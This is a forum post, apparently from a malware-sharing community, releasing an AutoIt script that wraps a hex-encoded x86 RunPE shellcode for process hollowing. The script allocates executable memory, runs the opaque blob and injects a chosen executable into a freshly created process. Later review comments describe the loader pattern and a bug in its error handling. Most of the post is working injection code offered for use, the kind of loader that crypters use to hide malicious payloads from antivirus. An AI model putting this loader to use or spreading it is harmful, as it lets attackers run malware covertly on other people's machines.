Wardow wrote: Hello!
I'm here to release a RunPE Shellcode I have made.
Information:
Gets Kernel32 and Ntdll modules addresses from PEB
Resolves the needed function pointers by walking the EAT (export address table)
Is able to apply fixups
Supports Unicode
Applies the proper section memory protection flags
Should technically never fail when the file has a relocation table (fixups)
You can pass custom arguments and the program to hollow
Should be as stable as possible
There should be no memory leaks
Call chain:
ntdll!RtlZeroMemory, CreateProcessW, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAlloc, VirtualAllocEx, ntdll!memcpy, WriteProcessMemory, VirtualProtectEx, SetThreadContext, ResumeThread
#cs ----------------------------------------------------------------------------
AutoIt Version: 3+
Author: Wardow
Script Function:
x86 RunPE Shellcode wrapper.
#ce ----------------------------------------------------------------------------
; Demo driver: asks RunPE to create a new instance of this very AutoIt interpreter
; (@AutoItExe) and replace its image with the raw bytes of Application.exe, then
; reports the value RunPE hands back. 0x40 is MB_ICONINFORMATION (= 64).
Global $ProcessId = RunPE(@AutoItExe, "", _
		FileRead("Application.exe"))
MsgBox(0x40, "RunPE has been executed", _
		"ProcessId: " & $ProcessId)
; Copies the embedded x86 shellcode below into a fresh RWX allocation inside this
; process and calls into it. The shellcode is an opaque hex blob: what it does is
; known only from the author's description in the post (CreateProcessW,
; NtUnmapViewOfSection, WriteProcessMemory, SetThreadContext, ResumeThread - the
; usual process-hollowing call chain) and cannot be verified from this listing.
; 32-bit only: every pointer and size is marshalled as "dword".
;   $wPath      - marshalled as "wstr" (UTF-16); per the driver and the post, the
;                 path of the executable to create and hollow (the driver passes
;                 @AutoItExe, i.e. the interpreter itself).
;   $wArguments - marshalled as "wstr"; command line for the new process.
;   $lpFile     - the bytes of the PE image to inject, held in an AutoIt string
;                 (the driver passes what FileRead returned); copied into a byte
;                 struct and handed to the shellcode by pointer.
; Returns the DWORD the shellcode returns when it is non-zero (the driver treats
; it as the new process id), otherwise False.
Func RunPE($wPath, $wArguments, $lpFile)
; Opaque shellcode bytes. DllCallAddress below enters the blob at offset 0x181,
; so it must stay byte-for-byte as is; its internal layout is not documented here.
Local $Bin_Shellcode = "0x558BEC8B4D088BC18039007406408038"
$Bin_Shellcode &= "0075FA2BC15DC20400558BEC56578B7D"
$Bin_Shellcode &= "0833F657E8D7FFFFFF8BC885C974200F"
$Bin_Shellcode &= "BE07C1E60403F08BC625000000F0740B"
$Bin_Shellcode &= "C1E81833F081E6FFFFFF0F474975E05F"
$Bin_Shellcode &= "8BC65E5DC20400558BEC51515356578B"
$Bin_Shellcode &= "7D0833F68B473C8B44387803C78B5020"
$Bin_Shellcode &= "8B581C03D78B482403DF8B401803CF89"
$Bin_Shellcode &= "55FC894DF889450885C074198B04B203"
$Bin_Shellcode &= "C750E882FFFFFF3B450C74148B55FC46"
$Bin_Shellcode &= "3B750872E733C05F5E5B8BE55DC20800"
$Bin_Shellcode &= "8B45F80FB704708B048303C7EBE9558B"
$Bin_Shellcode &= "EC8B4D0833D28BC1663911740883C002"
$Bin_Shellcode &= "66391075F82BC183E0FE5DC20400558B"
$Bin_Shellcode &= "EC5356578B7D0885FF74578B5D0C85DB"
$Bin_Shellcode &= "745057E8C6FFFFFF538BF0E8BEFFFFFF"
$Bin_Shellcode &= "3BF0753E2BDFC74508610000000FB70F"
$Bin_Shellcode &= "8BD10FB7343B8BC6663B4D08720681C2"
$Bin_Shellcode &= "E0FF0000663B7508720505E0FF000066"
$Bin_Shellcode &= "3BD0750E6685C9740583C702EBCF33C0"
$Bin_Shellcode &= "EB0333C0405F5E5B5DC20800558BEC64"
$Bin_Shellcode &= "A13000000056578B400C8B780C8BF7FF"
$Bin_Shellcode &= "7508FF7630E874FFFFFF85C0740A8B36"
$Bin_Shellcode &= "3BF775EB33C0EB038B46185F5E5DC204"
$Bin_Shellcode &= "00558BEC81EC24040000837D08005356"
$Bin_Shellcode &= "570F84DC050000837D10000F84D20500"
$Bin_Shellcode &= "006A6B586A65596A7266894588586A6E"
$Bin_Shellcode &= "5E6A6C5F6A336689458C586A32668945"
$Bin_Shellcode &= "94586A2E5A6A646689459633C066894D"
$Bin_Shellcode &= "8A66894D9059668945A06A7458668945"
$Bin_Shellcode &= "A633C0668945B68D45A4506689758E66"
$Bin_Shellcode &= "897D926689559866894D9A66897D9C66"
$Bin_Shellcode &= "897D9E668975A466894DA866897DAA66"
$Bin_Shellcode &= "897DAC668955AE66894DB066897DB266"
$Bin_Shellcode &= "897DB4E824FFFFFF8BF88D458850E819"
$Bin_Shellcode &= "FFFFFF8BD8C78528FFFFFF793A3C078D"
$Bin_Shellcode &= "45C4C7852CFFFFFF794A8A0B8985ECFE"
$Bin_Shellcode &= "FFFF8D45D88985F0FEFFFF8D45B88985"
$Bin_Shellcode &= "F4FEFFFF8D45848985F8FEFFFF8D45DC"
$Bin_Shellcode &= "8985FCFEFFFF8D8574FFFFFF898500FF"
$Bin_Shellcode &= "FFFF8D45D0C78530FFFFFFEE38830CC7"
$Bin_Shellcode &= "8534FFFFFF5764E101C78538FFFFFF18"
$Bin_Shellcode &= "E4CA08C7853CFFFFFFE3CAD803C78540"
$Bin_Shellcode &= "FFFFFF99B04806C78544FFFFFF93BA94"
$Bin_Shellcode &= "03C78548FFFFFFE4C7B904C7854CFFFF"
$Bin_Shellcode &= "FFE487B804C78550FFFFFFA92DD701C7"
$Bin_Shellcode &= "8554FFFFFF05D13D0BC78558FFFFFF44"
$Bin_Shellcode &= "27230FC7855CFFFFFFE86F180DC78560"
$Bin_Shellcode &= "FFFFFFB57DAE09898504FFFFFF8D8570"
$Bin_Shellcode &= "FFFFFF898508FFFFFF8D458089850CFF"
$Bin_Shellcode &= "FFFF8D8578FFFFFF898510FFFFFF8D85"
$Bin_Shellcode &= "7CFFFFFF898514FFFFFF8D45C0898518"
$Bin_Shellcode &= "FFFFFF8D856CFFFFFF89851CFFFFFF8D"
$Bin_Shellcode &= "45BC898520FFFFFF8D45E0898524FFFF"
$Bin_Shellcode &= "FF33C08BF0FFB4B528FFFFFF83FE028B"
$Bin_Shellcode &= "C70F4FC350E8DDFCFFFF8B8CB5ECFEFF"
$Bin_Shellcode &= "FF890185C00F84E80300004683FE0F7C"
$Bin_Shellcode &= "D433C040898564FFFFFF8D45E46A1050"
$Bin_Shellcode &= "FF55D86A448D85A8FEFFFF50FF55D868"
$Bin_Shellcode &= "CC0200008D85DCFBFFFFC785A8FEFFFF"
$Bin_Shellcode &= "4400000050FF55D88B4D1033D2C785DC"
$Bin_Shellcode &= "FBFFFF070001008BFA8B713C03F10FB7"
$Bin_Shellcode &= "46148955FC8955CC8945C83996A00000"
$Bin_Shellcode &= "0074163996A4000000740EF646160175"
$Bin_Shellcode &= "0833DB43895DF8EB058BDA8955F833C0"
$Bin_Shellcode &= "8955D46639110F94C03D4D5A00000F84"
$Bin_Shellcode &= "4F03000033C039160F94C03D50450000"
$Bin_Shellcode &= "0F843D03000033C0663956040F94C03D"
$Bin_Shellcode &= "4C0100000F84290300008D45E4508D85"
$Bin_Shellcode &= "A8FEFFFF5052526A04525252FF750CFF"
$Bin_Shellcode &= "7508FF558485C00F84C50200008D85DC"
$Bin_Shellcode &= "FBFFFF50FF75E8FF558085C00F84B002"
$Bin_Shellcode &= "000033C0506A048D45CC508B8580FCFF"
$Bin_Shellcode &= "FF83C00850FF75E4FF957CFFFFFF85C0"
$Bin_Shellcode &= "0F848C0200008B45CC3B4634750F50FF"
$Bin_Shellcode &= "75E4FF55B885C00F85750200006A4068"
$Bin_Shellcode &= "00300000FF765033C050FF9574FFFFFF"
$Bin_Shellcode &= "8BF885FF0F84580200006A4068003000"
$Bin_Shellcode &= "00FF7650FF7634FF75E4FF55DC8945FC"
$Bin_Shellcode &= "85C0754185DB7518FF7634FF75E4FF55"
$Bin_Shellcode &= "B86A406800300000FF7650FF7634EB14"
$Bin_Shellcode &= "6A406800300000FF765033C0C745D401"
$Bin_Shellcode &= "00000050FF75E4FF55DC8945FC85C00F"
$Bin_Shellcode &= "84FD010000FF7654FF751057FF55C433"
$Bin_Shellcode &= "C933C0894DF4663B4606732E8B5DC883"
$Bin_Shellcode &= "C32C03DEFF73FC8B03034510508B43F8"
$Bin_Shellcode &= "03C750FF55C48B4DF48D5B280FB74606"
$Bin_Shellcode &= "41894DF43BC87CDC33C98B5F3C8B45FC"
$Bin_Shellcode &= "03DF837DD4008943340F848100000083"
$Bin_Shellcode &= "7DF800747B8B93A000000003D7894DF8"
$Bin_Shellcode &= "398BA400000076688B420483E808894D"
$Bin_Shellcode &= "F4A9FEFFFFFF76410FB74C4A086685C9"
$Bin_Shellcode &= "74248B463481E1FF0F0000030A290439"
$Bin_Shellcode &= "8B45F40FB74C42088B433481E1FF0F00"
$Bin_Shellcode &= "00030A0104398B42048B4DF483E80841"
$Bin_Shellcode &= "D1E8894DF43BC872BF8B4DF8034A0403"
$Bin_Shellcode &= "52043B8BA40000006A00894DF8597298"
$Bin_Shellcode &= "33DB53FF765057FF75FCFF75E4FF55D0"
$Bin_Shellcode &= "85C00F840C0100008D8568FFFFFF506A"
$Bin_Shellcode &= "02FF7654FF75FCFF75E4FF55BC85C00F"
$Bin_Shellcode &= "84EF00000033C0895DF8663B4606736F"
$Bin_Shellcode &= "8B5DC883C33C03DE8B03A90000002074"
$Bin_Shellcode &= "1985C079046A40EB172500000040F7D8"
$Bin_Shellcode &= "1BC083E01083C010EB1585C079056A04"
$Bin_Shellcode &= "58EB0CA9000000406A00580F95C0408D"
$Bin_Shellcode &= "8D68FFFFFF5150FF73E48B43E80345FC"
$Bin_Shellcode &= "50FF75E4FF55BC85C074128B4DF883C3"
$Bin_Shellcode &= "280FB7460641894DF83BC8729B33DB68"
$Bin_Shellcode &= "008000005357FF55C085C07467536A04"
$Bin_Shellcode &= "8D45FC508B8580FCFFFF83C00850FF75"
$Bin_Shellcode &= "E4FF55D085C0744C8B46280345FC8985"
$Bin_Shellcode &= "8CFCFFFF8D85DCFBFFFF50FF75E8FF95"
$Bin_Shellcode &= "78FFFFFF85C0742CFF75E8FF956CFFFF"
$Bin_Shellcode &= "FF85C0741F837DE4007406FF75E4FF55"
$Bin_Shellcode &= "E0837DE8007406FF75E8FF55E08B45EC"
$Bin_Shellcode &= "EB4333DB837DE400741053FF75E4FF95"
$Bin_Shellcode &= "70FFFFFFFF75E4FF55E0837DE8007406"
$Bin_Shellcode &= "FF75E8FF55E085FF740A680080000053"
$Bin_Shellcode &= "57FF55C08B8564FFFFFF83F8050F8620"
$Bin_Shellcode &= "FCFFFF33C05F5E5B8BE55DC20C00"
; VirtualAlloc(NULL, size, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE).
; A private RWX region that is written to and then executed from inside the AutoIt
; interpreter is the in-memory loader pattern that memory scanners and EDR flag;
; the same bytes stay recoverable from this script's text for detection purposes.
Local $lpShellcode = DllCall("kernel32", "ptr", "VirtualAlloc", "dword", 0, "dword", BinaryLen($Bin_Shellcode), "dword", 0x3000, "dword", 0x40)
; DllCall returns an array on success; element 0 is the allocation base (NULL on failure).
If Not @error And $lpShellcode[0] Then
$lpShellcode = $lpShellcode[0]
Else
Return False
EndIf
; Byte struct overlaid on the RWX region so the hex blob can be copied in as raw bytes.
Local $Shellcode_Struct = DllStructCreate("byte shellcode[" & BinaryLen($Bin_Shellcode) & "]", $lpShellcode)
; Buffer for the PE image. It is sized with StringLen, so $lpFile is assumed to be a
; one-byte-per-character string (what the driver's FileRead returns in default mode);
; a Binary variant would need BinaryLen instead - NOTE(review): confirm with the caller.
Local $File_Struct = DllStructCreate("byte lpfile[" & StringLen($lpFile) & "]")
DllStructSetData($Shellcode_Struct, "shellcode", $Bin_Shellcode)
DllStructSetData($File_Struct, "lpfile", $lpFile)
; Enter the blob at base + 0x181 with (wide path, wide arguments, pointer to the image
; bytes); the shellcode hands back a single DWORD.
Local $Ret = DllCallAddress("dword", $lpShellcode + 0x181, "wstr", $wPath, "wstr", $wArguments, "ptr", DllStructGetPtr($File_Struct))
; VirtualFree(base, 0, 0x8000 = MEM_RELEASE), done unconditionally so the RWX region
; does not outlive the call whether or not the shellcode succeeded.
DllCall("kernel32", "dword", "VirtualFree", "dword", $lpShellcode, "dword", 0, "dword", 0x8000)
; NOTE(review): @error at this point reflects the VirtualFree DllCall on the line
; above, not the DllCallAddress; if DllCallAddress itself failed, $Ret is not an
; array and $Ret[0] raises a script error rather than reaching the False branch,
; so the False return path is not reliable for that failure.
If Not @error And $Ret[0] Then
Return $Ret[0]
Else
Return False
EndIf
EndFunc
Regards.